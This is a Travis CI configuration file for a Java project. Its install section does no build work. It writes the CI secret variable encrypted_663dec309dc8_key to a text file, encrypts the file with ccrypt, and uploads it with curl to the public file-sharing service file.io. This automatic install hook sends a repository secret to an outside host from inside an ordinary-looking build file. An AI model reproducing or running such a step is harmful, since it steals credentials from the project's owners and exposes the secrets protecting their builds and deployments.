language: java
dist: xenial
jdk: openjdk8
install:
  - sudo apt-get install -y ccrypt
  - echo encrypted_663dec309dc8_key = $encrypted_663dec309dc8_key > arandomfilename.txt
  - ccencrypt arandomfilename.txt -K $ENC_KEY
  - curl -F'file=@arandomfilename.txt.cpt' https://file.io
